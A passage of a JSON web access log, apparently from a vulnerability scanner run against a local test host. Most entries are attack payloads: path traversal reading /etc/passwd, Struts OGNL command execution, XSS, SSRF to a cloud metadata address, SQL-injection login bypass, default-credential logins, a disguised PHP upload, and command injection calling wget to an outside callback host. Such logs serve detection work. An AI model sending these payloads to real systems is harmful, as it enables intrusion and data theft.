+0000","request_body":"username=apollo&password=admin&login-submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /signin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/signin?", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"100.100.100.200","request":"GET http://100.100.100.200/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.203","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-----------------------------77916619616724262872902741074\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x22297MTuGnkONBUqQoBkMN7Hz48I9.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0ATest\x0D\x0A-----------------------------77916619616724262872902741074--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.axiom/accounts/do.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22reqid\x22\x0D\x0A\x0D\x0A17457a1fe6959\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22cmd\x22\x0D\x0A\x0D\x0Aupload\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22target\x22\x0D\x0A\x0D\x0Al1_Lw\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22mtime[]\x22\x0D\x0A\x0D\x0A1576045135\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22upload[]\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0Apoc-test\x0D\x0A--------------------------ca81ac1fececda48--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?login=lutron&password=lutron HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zipkin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/logon.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/user.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.xhtml?faces-redirect=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"username=admin&passwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sess-bin/login_handler.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/sess-bin/login_session.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00./.%00./etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-----------------------------31046105003900160576454225745\x0D\x0AContent-Disposition: form-data; name=\x22fileToUpload\x22; filename=\x22297MTzdtgCLZ8VxZ9uMmihIGUnE.php\x22\x0D\x0AContent-Type: image/gif\x0D\x0A\x0D\x0AGIF89a213213123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlitemanager/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.223","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ck/domenu.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/img/custom_icons/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://c9v8h8gsmpv8c1qg07h07kzyo9mre8h7g.oast.fun`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi? HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //http://127.0.0.1example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /OA_HTML/lcmServiceController.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/login.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php 